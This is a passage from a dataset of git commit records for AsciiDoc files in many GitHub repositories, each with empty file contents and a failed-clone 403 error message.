low99\/spring-security,fhanik\/spring-security,spring-projects\/spring-security,pwheel\/spring-security,chinazhaoht\/spring-security,olezhuravlev\/spring-security,eddumelendez\/spring-security,rwinch\/spring-security,zshift\/spring-security,wkorando\/spring-security,ollie314\/spring-security,raindev\/spring-security,rwinch\/spring-security,cyratech\/spring-security,olezhuravlev\/spring-security,thomasdarimont\/spring-security,ajdinhedzic\/spring-security,chinazhaoht\/spring-security,follow99\/spring-security,djechelon\/spring-security,mrkingybc\/spring-security,MatthiasWinzeler\/spring-security,spring-projects\/spring-security,panchenko\/spring-security,ollie314\/spring-security,driftman\/spring-security,MatthiasWinzeler\/spring-security,jgrandja\/spring-security,olezhuravlev\/spring-security,spring-projects\/spring-security,fhanik\/spring-security,hippostar\/spring-security,diegofernandes\/spring-security,pkdevbox\/spring-security,rwinch\/spring-security,xingguang2013\/spring-security,panchenko\/spring-security,thomasdarimont\/spring-security,vitorgv\/spring-security,ractive\/spring-security,xingguang2013\/spring-security,fhanik\/spring-security,pkdevbox\/spring-security,pwheel\/spring-security,yinhe402\/spring-security,liuguohua\/spring-security,zshift\/spring-security,izeye\/spring-security,rwinch\/spring-security,olezhuravlev\/spring-security,thomasdarimont\/spring-security,djechelon\/spring-security,eddumelendez\/spring-security,ractive\/spring-security,jmnarloch\/spring-security,mounb\/spring-security,ractive\/spring-security,yinhe402\/spring-security,vitorgv\/spring-security,driftman\/spring-security,kazuki43zoo\/spring-security,mdeinum\/spring-security,izeye\/spring-security,SanjayUser\/SpringSecurityPro,jmnarloch\/spring-security,mparaz\/spring-security,jgrandja\/spring-security,hippostar\/spring-security,yinhe402\/spring-security,zgscwjm\/spring-security,Xcorpio\/spring-security,forestqqqq\/spring-security,SanjayUser\/SpringSecurityPro,djechelon\/spring-security,rwinch\/spring-security,follow99\/spring-security,mdeinum\/spring-security,mounb\/spring-security,zshift\/spring-security,adairtaosy\/spring-security,follow99\/spring-security,zgscwjm\/spring-security,Xcorpio\/spring-security,likaiwalkman\/spring-security,ajdinhedzic\/spring-security,panchenko\/spring-security,SanjayUser\/SpringSecurityPro,raindev\/spring-security,mrkingybc\/spring-security,zhaoqin102\/spring-security,likaiwalkman\/spring-security,forestqqqq\/spring-security,djechelon\/spring-security,cyratech\/spring-security,zhaoqin102\/spring-security,jgrandja\/spring-security,caiwenshu\/spring-security,mounb\/spring-security,diegofernandes\/spring-security,izeye\/spring-security,chinazhaoht\/spring-security,forestqqqq\/spring-security,vitorgv\/spring-security,ollie314\/spring-security","old_file":"docs\/manual\/src\/asciidoc\/index.adoc","new_file":"docs\/manual\/src\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmnarloch\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e1441562f86ad343fbea85b0bf1bf36cef5f8f2e","subject":"Create best-practices.adoc","message":"Create best-practices.adoc\n\nCloses https:\/\/github.com\/platosha\/angular-polymer\/issues\/92 and https:\/\/github.com\/platosha\/angular-polymer\/issues\/96","repos":"platosha\/angular-polymer,platosha\/angular-polymer,platosha\/angular-polymer,vaadin\/angular2-polymer,vaadin\/angular2-polymer","old_file":"docs\/best-practices.adoc","new_file":"docs\/best-practices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vaadin\/angular2-polymer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2dbb4b6dd99608ae9d604971822b09e29dd104f1","subject":"Update 2016-07-20-vim.adoc","message":"Update 2016-07-20-vim.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vim.adoc","new_file":"_posts\/2016-07-20-vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e8c74cd4bd24d018b155b381ba26d29af17b76a4","subject":"Corrected a typo","message":"Corrected a typo","repos":"pombredanne\/django-hstore,Stranger6667\/django-hstore,pombredanne\/django-hstore,pombredanne\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore,pombredanne\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore,djangonauts\/django-hstore,djangonauts\/django-hstore,Stranger6667\/django-hstore","old_file":"doc\/doc.asciidoc","new_file":"doc\/doc.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/djangonauts\/django-hstore.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ec61cb9e5c2baad08f408310629522ecb8c551f","subject":"Update 2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","message":"Update 2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","new_file":"_posts\/2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f63f0da8ba0af52e30780e977ea830688fb56ff","subject":"Documented the prefixes of html ids","message":"Documented the prefixes of html ids\n","repos":"uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/osis","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"81739d605b63bb18a90ab576b02ed9fc49b362b0","subject":"jeeconf included","message":"jeeconf included\n","repos":"tsypuk\/springrestdoc","old_file":"restdocs\/src\/docs\/asciidoc\/etc\/public.adoc","new_file":"restdocs\/src\/docs\/asciidoc\/etc\/public.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tsypuk\/springrestdoc.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e0688df72e16c25e088d5d70036a1c2a118e986","subject":"Doc structure changes","message":"Doc structure changes\n\nIntroduce a top level doc that aggregates various sub docs\n","repos":"spring-cloud\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,garyrussell\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,garyrussell\/spring-cloud-stream,garyrussell\/spring-cloud-stream","old_file":"spring-cloud-stream-binder-kafka-docs\/src\/main\/asciidoc\/spring-cloud-stream-binder-kafka-aggregate.adoc","new_file":"spring-cloud-stream-binder-kafka-docs\/src\/main\/asciidoc\/spring-cloud-stream-binder-kafka-aggregate.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/garyrussell\/spring-cloud-stream.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c323210b8eaf2168c6729ec835ee192169fece2c","subject":"minor rx-stats","message":"minor rx-stats\n","repos":"dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"draft_trex_stateless.asciidoc","new_file":"draft_trex_stateless.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"56011d3761897ee547d139f219aa89f53fd5ded6","subject":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","message":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"426e4914bd359f7e9f842fdb97eba899d29d7872","subject":"Doc for Quickstart","message":"Doc for Quickstart\n\nChange-Id: Icd07c623bd340d66297d72063a1255b38d36fcea\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/933\nReviewed-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\nTested-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\n","repos":"andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu","old_file":"docs\/quickstart.adoc","new_file":"docs\/quickstart.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"83b0e6675ef0246424d3dee29694731ffd9fa404","subject":"Init Project","message":"Init Project\n","repos":"bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bindstone\/graphbank.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9b2475df4785d2c1a610900fa3e5f17334a761e5","subject":"initial commit","message":"initial commit\n","repos":"wombat\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wombat\/kubernetes-aws-workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0edc9d5eccfadf529e5381032e600829dbc23782","subject":"Readme gratipay","message":"Readme gratipay\n","repos":"hypatia-software-org\/hypatia-engine,Applemann\/hypatia,hypatia-software-org\/hypatia-engine,lillian-lemmer\/hypatia,brechin\/hypatia,Applemann\/hypatia,brechin\/hypatia,lillian-lemmer\/hypatia","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hypatia-software-org\/hypatia-engine.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3b3d3f0def42b96cc1313e59cb6a5a4bd086b097","subject":"Add date formats","message":"Add date formats\n","repos":"brianary\/brianary.github.io","old_file":"date-formats.adoc","new_file":"date-formats.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brianary\/brianary.github.io.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"c91f01ce7ed5e67ae7e052d6eac11b6b46c8df90","subject":"Update 2016-09-23-wtf-log.adoc","message":"Update 2016-09-23-wtf-log.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-23-wtf-log.adoc","new_file":"_posts\/2016-09-23-wtf-log.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"884732af59c2585e1e3e47c654e9faf509495562","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49c558f5c7ef42112338da57e95f47fb8112f364","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"968790e1d8afcda1d6e289382449eae71207b13b","subject":"Create Vim.adoc","message":"Create Vim.adoc","repos":"smru\/Documentation,smru\/Documentation","old_file":"Linux\/Vim.adoc","new_file":"Linux\/Vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smru\/Documentation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a333440d448196353e88e70fde871fbb308517a","subject":"Update 2015-07-10-Welcome-to-GWCATT.adoc","message":"Update 2015-07-10-Welcome-to-GWCATT.adoc","repos":"GWCATT\/gwcatt.github.io,GWCATT\/gwcatt.github.io,GWCATT\/gwcatt.github.io","old_file":"_posts\/2015-07-10-Welcome-to-GWCATT.adoc","new_file":"_posts\/2015-07-10-Welcome-to-GWCATT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GWCATT\/gwcatt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8db3430fe149bd9e4d4a23c445c848227bdfce30","subject":"Update 2015-09-22-Initialization-and-Cleanup.adoc","message":"Update 2015-09-22-Initialization-and-Cleanup.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-22-Initialization-and-Cleanup.adoc","new_file":"_posts\/2015-09-22-Initialization-and-Cleanup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"182988ab77e1a6d47bddf5672c2d97487891da61","subject":"Update 2015-10-12-A-Bureaucratic-Ethnography.adoc","message":"Update 2015-10-12-A-Bureaucratic-Ethnography.adoc","repos":"Cribstone\/humblehacker,Cribstone\/humblehacker,Cribstone\/humblehacker","old_file":"_posts\/2015-10-12-A-Bureaucratic-Ethnography.adoc","new_file":"_posts\/2015-10-12-A-Bureaucratic-Ethnography.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Cribstone\/humblehacker.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e7251cac54945854142432db9dc601ba5b7c9ad6","subject":"y2b create post The World's Thinnest Laptop!","message":"y2b create post The World's Thinnest Laptop!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-04-05-The-Worlds-Thinnest-Laptop.adoc","new_file":"_posts\/2016-04-05-The-Worlds-Thinnest-Laptop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b4f8fcd4f45761cb866bc1bf1dbf1f6964e1e5d","subject":"Update 2019-02-10-RTFM-Episode-0x01.adoc","message":"Update 2019-02-10-RTFM-Episode-0x01.adoc","repos":"kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io","old_file":"_posts\/2019-02-10-RTFM-Episode-0x01.adoc","new_file":"_posts\/2019-02-10-RTFM-Episode-0x01.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kr-b\/kr-b.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87f7783455f11657dbd8bdedd760e11526ac3d1f","subject":"lots of cleanup","message":"lots of cleanup\n","repos":"clojure\/clojure-site","old_file":"content\/guides\/spec.adoc","new_file":"content\/guides\/spec.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"4262936acf02d240caaab29e6ab97c3814922df8","subject":"Fix two typos","message":"Fix two typos","repos":"clojure\/clojure-site","old_file":"content\/guides\/spec.adoc","new_file":"content\/guides\/spec.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"532bde5dce7d041160552312a510c9129fcceca1","subject":"sync up tools list","message":"sync up tools list\n","repos":"clojure\/clojurescript-site","old_file":"content\/tools\/tools.adoc","new_file":"content\/tools\/tools.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"ca8a74abc8c9d9d4eaaeb005c9762a5df12d811e","subject":"Update 2017-02-09-test1.adoc","message":"Update 2017-02-09-test1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-test1.adoc","new_file":"_posts\/2017-02-09-test1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a14e75b2375004ed540bdc9356dc0a2133a41dd7","subject":"Start blogpost.","message":"Start blogpost.\n","repos":"stuartwdouglas\/wildfly.org,adrianoschmidt\/wildfly.org,ctomc\/wildfly.org,ctomc\/wildfly.org,stuartwdouglas\/wildfly.org,luck3y\/wildfly.org,luck3y\/wildfly.org,luck3y\/wildfly.org,rhusar\/wildfly.org,ctomc\/wildfly.org,stuartwdouglas\/wildfly.org,rhusar\/wildfly.org,luck3y\/wildfly.org,rhusar\/wildfly.org,adrianoschmidt\/wildfly.org,stuartwdouglas\/wildfly.org,rhusar\/wildfly.org,adrianoschmidt\/wildfly.org,ctomc\/wildfly.org,adrianoschmidt\/wildfly.org","old_file":"news\/2015-05-05-WildFly-Swarm-Released.adoc","new_file":"news\/2015-05-05-WildFly-Swarm-Released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rhusar\/wildfly.org.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"31beaad7fb01fa1ace1a18af0d1126a255d6d940","subject":"Update Asciidoctor.adoc","message":"Update Asciidoctor.adoc","repos":"smru\/Documentation,smru\/Documentation","old_file":"Linux\/Asciidoctor.adoc","new_file":"Linux\/Asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smru\/Documentation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee77e880a416abebd6956150f020a1ec5f508a44","subject":"y2b create post Duke Nukem Giveaway - UPDATE!","message":"y2b create post Duke Nukem Giveaway - UPDATE!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-07-05-Duke-Nukem-Giveaway--UPDATE.adoc","new_file":"_posts\/2011-07-05-Duke-Nukem-Giveaway--UPDATE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"164adae1acf4b0fcb29a8147560d22f67ed18a03","subject":"Publish 2016-6-25-Git-one.adoc","message":"Publish 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-25-Git-one.adoc","new_file":"2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6630ae1d4bc305bdd58d743292e20fa53a1f3649","subject":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","message":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49c7e4381240443de4d362e8db232f5546e55686","subject":"Update 2016-10-05-11092015-Prototype-Createur.adoc","message":"Update 2016-10-05-11092015-Prototype-Createur.adoc","repos":"3991\/3991.github.io,3991\/3991.github.io,3991\/3991.github.io,3991\/3991.github.io","old_file":"_posts\/2016-10-05-11092015-Prototype-Createur.adoc","new_file":"_posts\/2016-10-05-11092015-Prototype-Createur.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/3991\/3991.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"203a079e14d3f1a85edab0a602152b9c3705cdca","subject":"Update 2014-10-25-My-first-week.adoc","message":"Update 2014-10-25-My-first-week.adoc","repos":"thiderman\/daenney.github.io,thiderman\/daenney.github.io,thiderman\/daenney.github.io","old_file":"_posts\/2014-10-25-My-first-week.adoc","new_file":"_posts\/2014-10-25-My-first-week.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thiderman\/daenney.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"511bba0c7abee21c8ec8b241258c9fc96901b9ca","subject":"Changed ContentMode Package in Label doc","message":"Changed ContentMode Package in Label doc","repos":"mstahv\/framework,Darsstar\/framework,Darsstar\/framework,asashour\/framework,mstahv\/framework,mstahv\/framework,asashour\/framework,mstahv\/framework,mstahv\/framework,asashour\/framework,asashour\/framework,Darsstar\/framework,asashour\/framework,Darsstar\/framework,Darsstar\/framework","old_file":"documentation\/components\/components-label.asciidoc","new_file":"documentation\/components\/components-label.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5461d47b8721d03bb6a69a9aa2f7a78e03835a56","subject":"Update 2018-11-28-vr-programing.adoc","message":"Update 2018-11-28-vr-programing.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-28-vr-programing.adoc","new_file":"_posts\/2018-11-28-vr-programing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"427dfc61ace9cbc42ac8b7960e84249fef836315","subject":"Added addons addon docs","message":"Added addons addon docs\n","repos":"oscerd\/core,pplatek\/core,forge\/core,jerr\/jbossforge-core,jerr\/jbossforge-core,jerr\/jbossforge-core,oscerd\/core,D9110\/core,jerr\/jbossforge-core,oscerd\/core,ivannov\/core,D9110\/core,D9110\/core,agoncal\/core,jerr\/jbossforge-core,pplatek\/core,forge\/core,D9110\/core,agoncal\/core,ivannov\/core,ivannov\/core,ivannov\/core,D9110\/core,D9110\/core,jerr\/jbossforge-core,pplatek\/core,D9110\/core,pplatek\/core,agoncal\/core,agoncal\/core,oscerd\/core,agoncal\/core,agoncal\/core,ivannov\/core,forge\/core,jerr\/jbossforge-core,ivannov\/core,D9110\/core,forge\/core,pplatek\/core,ivannov\/core,agoncal\/core,D9110\/core,oscerd\/core,forge\/core,agoncal\/core,oscerd\/core,oscerd\/core,forge\/core,agoncal\/core,oscerd\/core,forge\/core,jerr\/jbossforge-core,jerr\/jbossforge-core,agoncal\/core,pplatek\/core,forge\/core,forge\/core,ivannov\/core,D9110\/core,oscerd\/core,stalep\/forge-core,pplatek\/core,pplatek\/core,ivannov\/core,pplatek\/core,oscerd\/core,pplatek\/core,stalep\/forge-core,forge\/core,ivannov\/core,jerr\/jbossforge-core","old_file":"addons\/README.asciidoc","new_file":"addons\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ivannov\/core.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"3d94e33f9855f96e77e8daec3b7eaa01413ff1e9","subject":"Update 2017-08-22.adoc","message":"Update 2017-08-22.adoc","repos":"SRTjiawei\/SRTjiawei.github.io,SRTjiawei\/SRTjiawei.github.io,SRTjiawei\/SRTjiawei.github.io,SRTjiawei\/SRTjiawei.github.io","old_file":"_posts\/2017-08-22.adoc","new_file":"_posts\/2017-08-22.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SRTjiawei\/SRTjiawei.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b73a33abfc9481bfbb137cc38089c795d747a29","subject":"Update 2015-04-15-Development-environment.adoc","message":"Update 2015-04-15-Development-environment.adoc","repos":"der3k\/der3k.github.io,der3k\/der3k.github.io,der3k\/der3k.github.io","old_file":"_posts\/2015-04-15-Development-environment.adoc","new_file":"_posts\/2015-04-15-Development-environment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/der3k\/der3k.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f1b8556ce5c8762c56625d9c70fb021d934aaf4","subject":"Update 2017-03-14-instalando-nativescript.adoc","message":"Update 2017-03-14-instalando-nativescript.adoc","repos":"NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io","old_file":"_posts\/2017-03-14-instalando-nativescript.adoc","new_file":"_posts\/2017-03-14-instalando-nativescript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NativeScriptBrasil\/nativescriptbrasil.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be892aa2a662edd8d752782a5bc9ff65c59fc2a2","subject":"Update 2015-09-02-title.adoc","message":"Update 